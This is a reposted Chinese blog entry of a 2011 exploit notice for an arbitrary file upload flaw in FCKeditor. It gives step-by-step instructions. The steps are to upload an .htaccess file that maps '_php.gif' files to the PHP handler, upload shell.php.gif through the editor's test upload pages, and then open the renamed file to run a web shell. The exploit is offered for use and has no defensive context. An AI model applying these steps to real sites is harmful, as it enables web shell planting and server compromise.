FCKeditor所有版本任意文件上传缺陷
生活随笔
收集整理的這篇文章主要介紹了
FCKeditor所有版本任意文件上传缺陷
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
In The Name Of GOD
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] script:http://sourceforge.net/projects/fckeditor/
[+] Author??: pentesters.ir
[+] Website : WwW.PenTesters.IR
利用步驟:
1.創建一個htaccess文件:
代碼內容:
<FilesMatch “_php.gif”>
SetHandler application/x-httpd-php
</FilesMatch>
2.使用編輯器上傳htaccess文件.
http://www.xxx.com/FCKeditor/editor/filemanager/upload/test.html
http://www.xxx.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
3.上傳shell.php.gif
4.上傳后shell.php.gif, 會自動被改名為 shell_php.gif
5.訪問http://www.xxx.com/上傳目錄/shell_php.gif
轉載于:https://www.cnblogs.com/mujj/articles/2165996.html
總結
以上是生活随笔為你收集整理的FCKeditor所有版本任意文件上传缺陷的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Android 获取存储卡路径和空间使用
- 下一篇: log4cplus的内存泄露问题